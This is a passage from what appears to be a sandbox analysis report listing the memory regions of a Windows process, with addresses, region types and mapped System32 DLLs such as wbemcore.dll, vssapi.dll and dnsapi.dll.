filename = ""
Region:
id = 4275
start_va = 0xa60000
end_va = 0xa60fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a60000"
filename = ""
Region:
id = 4276
start_va = 0x7fef8870000
end_va = 0x7fef8877fff
monitored = 0
entry_point = 0x7fef8871020
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 4283
start_va = 0x7fef8790000
end_va = 0x7fef87dffff
monitored = 0
entry_point = 0x7fef8791190
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 4284
start_va = 0x7fefd710000
end_va = 0x7fefd723fff
monitored = 0
entry_point = 0x7fefd714160
region_type = mapped_file
name = "cryptdll.dll"
filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll")
Region:
id = 4285
start_va = 0x7fef8770000
end_va = 0x7fef8788fff
monitored = 0
entry_point = 0x7fef8771104
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 4286
start_va = 0x1260000
end_va = 0x12dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001260000"
filename = ""
Region:
id = 4287
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 4288
start_va = 0x1f60000
end_va = 0x1fdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f60000"
filename = ""
Region:
id = 4289
start_va = 0x2200000
end_va = 0x227ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 4290
start_va = 0x2360000
end_va = 0x236ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002360000"
filename = ""
Region:
id = 4291
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 4292
start_va = 0x1fe0000
end_va = 0x213ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001fe0000"
filename = ""
Region:
id = 4293
start_va = 0x20c0000
end_va = 0x213ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000020c0000"
filename = ""
Region:
id = 4294
start_va = 0x2150000
end_va = 0x21cffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002150000"
filename = ""
Region:
id = 4295
start_va = 0x2370000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 4296
start_va = 0x24f0000
end_va = 0x256ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000024f0000"
filename = ""
Region:
id = 4297
start_va = 0x1cb0000
end_va = 0x1daffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001cb0000"
filename = ""
Region:
id = 4298
start_va = 0x2570000
end_va = 0x266ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002570000"
filename = ""
Region:
id = 4299
start_va = 0x7fefa810000
end_va = 0x7fefa9bffff
monitored = 0
entry_point = 0x7fefa811010
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 4300
start_va = 0x7fefa7b0000
end_va = 0x7fefa7c6fff
monitored = 0
entry_point = 0x7fefa7b1060
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 4301
start_va = 0xa60000
end_va = 0xa67fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "vsstrace.dll.mui"
filename = "\\Windows\\System32\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\vsstrace.dll.mui")
Region:
id = 4302
start_va = 0x7fefbd80000
end_va = 0x7fefbd93fff
monitored = 0
entry_point = 0x7fefbd816b4
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 4303
start_va = 0x22d0000
end_va = 0x234ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000022d0000"
filename = ""
Region:
id = 4304
start_va = 0x7fef86e0000
end_va = 0x7fef8763fff
monitored = 0
entry_point = 0x7fef8731118
region_type = mapped_file
name = "netcfgx.dll"
filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")
Region:
id = 4305
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 4306
start_va = 0x2670000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 4307
start_va = 0x2670000
end_va = 0x276ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002670000"
filename = ""
Region:
id = 4308
start_va = 0x27f0000
end_va = 0x27fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000027f0000"
filename = ""
Region:
id = 4309
start_va = 0x2800000
end_va = 0x297ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 4310
start_va = 0x7fefcf50000
end_va = 0x7fefcf61fff
monitored = 0
entry_point = 0x7fefcf51060
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 4311
start_va = 0x2800000
end_va = 0x28fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002800000"
filename = ""
Region:
id = 4312
start_va = 0x2970000
end_va = 0x297ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002970000"
filename = ""
Region:
id = 4313
start_va = 0x2020000
end_va = 0x209ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002020000"
filename = ""
Region:
id = 4314
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 4315
start_va = 0x7fef83e0000
end_va = 0x7fef83f9fff
monitored = 0
entry_point = 0x7fef83f3fbc
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 4316
start_va = 0x7fef82b0000
end_va = 0x7fef83dbfff
monitored = 0
entry_point = 0x7fef8360ef0
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 4317
start_va = 0x2370000
end_va = 0x23effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 4318
start_va = 0x2430000
end_va = 0x24affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002430000"
filename = ""
Region:
id = 4319
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 4320
start_va = 0x7fef8240000
end_va = 0x7fef82a1fff
monitored = 0
entry_point = 0x7fef827bd80
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 4321
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 4322
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 4323
start_va = 0x2980000
end_va = 0x2b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 4324
start_va = 0x29e0000
end_va = 0x2a5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000029e0000"
filename = ""
Region:
id = 4325
start_va = 0x2aa0000
end_va = 0x2b1ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002aa0000"
filename = ""
Region:
id = 4326
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 4327
start_va = 0x7fefb020000
end_va = 0x7fefb030fff
monitored = 0
entry_point = 0x7fefb0216ac
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 4328
start_va = 0x7fef8220000
end_va = 0x7fef8232fff
monitored = 0
entry_point = 0x7fef8221d80
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 4329
start_va = 0x7fefb000000
end_va = 0x7fefb017fff
monitored = 0
entry_point = 0x7fefb001bf8
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 4330
start_va = 0x2c60000
end_va = 0x2cdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002c60000"
filename = ""
Region:
id = 4331
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 4332
start_va = 0x2570000
end_va = 0x25effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002570000"
filename = ""
Region:
id = 4333
start_va = 0x25f0000
end_va = 0x266ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000025f0000"
filename = ""
Region:
id = 4334
start_va = 0x7fef80a0000
end_va = 0x7fef818dfff
monitored = 0
entry_point = 0x7fef80a12a0
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 4335
start_va = 0x7fffff7e000
end_va = 0x7fffff7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7e000"
filename = ""
Region:
id = 4336
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 4337
start_va = 0x2bd0000
end_va = 0x2c4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002bd0000"
filename = ""
Region:
id = 4338
start_va = 0x7fffff7c000
end_va = 0x7fffff7dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7c000"
filename = ""
Region:
id = 4339
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 4348
start_va = 0x7fefd2b0000
end_va = 0x7fefd30afff
monitored = 0
entry_point = 0x7fefd2b6940
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 4349
start_va = 0x2ce0000
end_va = 0x2eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ce0000"
filename = ""
Region:
id = 4350
start_va = 0x7fefb580000
end_va = 0x7fefb587fff
monitored = 0
entry_point = 0x7fefb581414
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 4351
start_va = 0x7fef7c60000
end_va = 0x7fef7ccafff
monitored = 0
entry_point = 0x7fef7ca4344
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 4352
start_va = 0x7fef8880000
end_va = 0x7fef888dfff
monitored = 0
entry_point = 0x7fef8885500
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 4353
start_va = 0x2db0000
end_va = 0x2e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002db0000"
filename = ""
Region:
id = 4354
start_va = 0x2e70000
end_va = 0x2eeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002e70000"
filename = ""
Region:
id = 4355
start_va = 0x7fffff7a000
end_va = 0x7fffff7bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff7a000"
filename = ""
Region:
id = 4356
start_va = 0x7fef7c30000
end_va = 0x7fef7c50fff
monitored = 0
entry_point = 0x7fef7c403b0
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 4357
start_va = 0x7fef7bd0000
end_va = 0x7fef7c29fff
monitored = 0
entry_point = 0x7fef7c0dde0
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 4358
start_va = 0x7fef7b50000
end_va = 0x7fef7bc3fff
monitored = 0
entry_point = 0x7fef7b566f0
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 4359
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 4360
start_va = 0x7fef7b40000
end_va = 0x7fef7b4bfff
monitored = 0
entry_point = 0x7fef7b4602c
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 4361
start_va = 0x2ef0000
end_va = 0x30effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002ef0000"
filename = ""
Region:
id = 4363
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a70000"
filename = ""
Region:
id = 4367
start_va = 0x30f0000
end_va = 0x34effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000030f0000"
filename = ""
Region:
id = 4368
start_va = 0x3580000
end_va = 0x35fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003580000"
filename = ""
Region:
id = 4369
start_va = 0x7fffff78000
end_va = 0x7fffff79fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff78000"
filename = ""
Region:
id = 4370
start_va = 0x2b50000
end_va = 0x2bcffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b50000"
filename = ""
Region:
id = 4371
start_va = 0x3610000
end_va = 0x368ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003610000"
filename = ""
Region:
id = 4372
start_va = 0x36a0000
end_va = 0x371ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000036a0000"
filename = ""
Region:
id = 4373
start_va = 0x3830000
end_va = 0x38affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003830000"
filename = ""
Region:
id = 4374
start_va = 0x3960000
end_va = 0x39dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003960000"
filename = ""
Region:
id = 4375
start_va = 0x3a10000
end_va = 0x3a8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a10000"
filename = ""
Region:
id = 4376
start_va = 0x7fffff6c000
end_va = 0x7fffff6dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6c000"
filename = ""
Region:
id = 4377
start_va = 0x7fffff6e000
end_va = 0x7fffff6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6e000"
filename = ""
Region:
id = 4378
start_va = 0x7fffff70000
end_va = 0x7fffff71fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 4379
start_va = 0x7fffff72000
end_va = 0x7fffff73fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff72000"
filename = ""
Region:
id = 4380
start_va = 0x7fffff74000
end_va = 0x7fffff75fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff74000"
filename = ""
Region:
id = 4381
start_va = 0x7fffff76000
end_va = 0x7fffff77fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff76000"
filename = ""
Region:
id = 4390
start_va = 0x3a90000
end_va = 0x428ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003a90000"
filename = ""
Region:
id = 4396
start_va = 0x4290000
end_va = 0x525ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000004290000"
filename = ""
Region:
id = 4400
start_va = 0x3720000
end_va = 0x381ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003720000"
filename = ""
Region:
id = 4401
start_va = 0x7fef5060000
end_va = 0x7fef5114fff
monitored = 0
entry_point = 0x7fef50dcf80
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 4407
start_va = 0x7fef5040000
end_va = 0x7fef5051fff
monitored = 0
entry_point = 0x7fef50489d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 4408
start_va = 0xa70000
end_va = 0xa70fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000a70000"
filename = ""
Region:
id = 4409
start_va = 0x3500000
end_va = 0x357ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000003500000"
filename = ""
Region:
id = 4410
start_va = 0x7fffff6a000
end_va = 0x7fffff6bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff6a000"
filename = ""
Region:
id = 4411
start_va = 0x7fef4f40000
end_va = 0x7fef4fb0fff
monitored = 0
entry_point = 0x7fef4f851d0
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 4412
start_va = 0x5310000
end_va = 0x538ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005310000"
filename = ""
Region:
id = 4413
start_va = 0x7fffff68000
end_va = 0x7fffff69fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff68000"
filename = ""
Region:
id = 4523
start_va = 0x2d30000
end_va = 0x2daffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d30000"
filename = ""
Region:
id = 4524
start_va = 0x38e0000
end_va = 0x395ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000038e0000"
filename = ""
Region:
id = 4525
start_va = 0x5290000
end_va = 0x530ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005290000"
filename = ""
Region:
id = 4526
start_va = 0x5440000
end_va = 0x54bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005440000"
filename = ""
Region:
id = 4527
start_va = 0x54c0000
end_va = 0x553ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000054c0000"
filename = ""
Region:
id = 4528
start_va = 0x5570000
end_va = 0x55effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005570000"
filename = ""
Region:
id = 4529
start_va = 0x7fffff5c000
end_va = 0x7fffff5dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5c000"
filename = ""
Region:
id = 4530
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 4531
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 4532
start_va = 0x7fffff62000
end_va = 0x7fffff63fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff62000"
filename = ""
Region:
id = 4533
start_va = 0x7fffff64000
end_va = 0x7fffff65fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff64000"
filename = ""
Region:
id = 4534
start_va = 0x7fffff66000
end_va = 0x7fffff67fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff66000"
filename = ""
Region:
id = 4563
start_va = 0xde0000
end_va = 0xdf5fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000de0000"
filename = ""
Region:
id = 4566
start_va = 0xde0000
end_va = 0xdfbfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "firewallapi.dll.mui"
filename = "\\Windows\\System32\\en-US\\FirewallAPI.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\firewallapi.dll.mui")
Region:
id = 4696
start_va = 0xa80000
end_va = 0xa80fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000a80000"
filename = ""
Region:
id = 4697
start_va = 0x5460000
end_va = 0x54dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005460000"
filename = ""
Region:
id = 4698
start_va = 0x5530000
end_va = 0x55affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005530000"
filename = ""
Region:
id = 4699
start_va = 0x5290000
end_va = 0x530ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005290000"
filename = ""
Region:
id = 4700
start_va = 0x5620000
end_va = 0x569ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005620000"
filename = ""
Region:
id = 4701
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 4702
start_va = 0x7fffff60000
end_va = 0x7fffff61fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 4703
start_va = 0x5710000
end_va = 0x578ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005710000"
filename = ""
Region:
id = 4704
start_va = 0x57d0000
end_va = 0x584ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000057d0000"
filename = ""
Region:
id = 4705
start_va = 0x7fffff5a000
end_va = 0x7fffff5bfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5a000"
filename = ""
Region:
id = 4706
start_va = 0x7fffff5c000
end_va = 0x7fffff5dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5c000"
filename = ""
Region:
id = 4707
start_va = 0x5860000
end_va = 0x58dffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005860000"
filename = ""
Region:
id = 4708
start_va = 0x5910000
end_va = 0x598ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005910000"
filename = ""
Region:
id = 4709
start_va = 0x7fffff56000
end_va = 0x7fffff57fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff56000"
filename = ""
Region:
id = 4710
start_va = 0x7fffff58000
end_va = 0x7fffff59fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff58000"
filename = ""
Region:
id = 4711
start_va = 0x5ac0000
end_va = 0x5b3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005ac0000"
filename = ""
Region:
id = 4712
start_va = 0x7fffff54000
end_va = 0x7fffff55fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff54000"
filename = ""
Region:
id = 4713
start_va = 0x7fef72f0000
end_va = 0x7fef7306fff
monitored = 0
entry_point = 0x7fef72f9d50
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 4897
start_va = 0x59c0000
end_va = 0x5a3ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000059c0000"
filename = ""
Region:
id = 4898
start_va = 0x5a40000
end_va = 0x5abffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005a40000"
filename = ""
Region:
id = 4899
start_va = 0x5b70000
end_va = 0x5beffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005b70000"
filename = ""
Region:
id = 4900
start_va = 0x7fffff4e000
end_va = 0x7fffff4ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff4e000"
filename = ""
Region:
id = 4901
start_va = 0x7fffff50000
end_va = 0x7fffff51fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff50000"
filename = ""
Region:
id = 4902
start_va = 0x7fffff52000
end_va = 0x7fffff53fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff52000"
filename = ""
Region:
id = 5474
start_va = 0xe00000
end_va = 0xe07fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000e00000"
filename = ""
Region:
id = 5475
start_va = 0x5260000
end_va = 0x545ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000005260000"
filename = ""
Region:
id = 5836
start_va = 0x1f40000
end_va = 0x1fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f40000"
filename = ""
Region:
id = 5837
start_va = 0x7fffffd9000
end_va = 0x7fffffdafff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd9000"
filename = ""
Region:
id = 5838
start_va = 0x2280000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002280000"
filename = ""
Region:
id = 5839
start_va = 0x2370000
end_va = 0x23effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002370000"
filename = ""
Region:
id = 5840
start_va = 0x2980000
end_va = 0x29fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 5841
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 5842
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 5843
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 5844
start_va = 0x15b0000
end_va = 0x162ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000015b0000"
filename = ""
Region:
id = 5845
start_va = 0x2040000
end_va = 0x20bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002040000"
filename = ""
Region:
id = 5846
start_va = 0x2b30000
end_va = 0x2baffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b30000"
filename = ""
Region:
id = 5847
start_va = 0x2d20000
end_va = 0x2d9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002d20000"
filename = ""
Region:
id = 5848
start_va = 0x7fef4450000
end_va = 0x7fef46a2fff
monitored = 0
entry_point = 0x7fef445236c
region_type = mapped_file
name = "wuaueng.dll"
filename = "\\Windows\\System32\\wuaueng.dll" (normalized: "c:\\windows\\system32\\wuaueng.dll")
Region:
id = 5849
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 5850
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 5851
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 5852
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 5853
start_va = 0x7fef47d0000
end_va = 0x7fef4a49fff
monitored = 0
entry_point = 0x7fef4802200
region_type = mapped_file
name = "esent.dll"
filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll")
Region:
id = 5854
start_va = 0x7fef7420000
end_va = 0x7fef7490fff
monitored = 0
entry_point = 0x7fef745ecc4
region_type = mapped_file
name = "winspool.drv"
filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv")
Region:
id = 5855
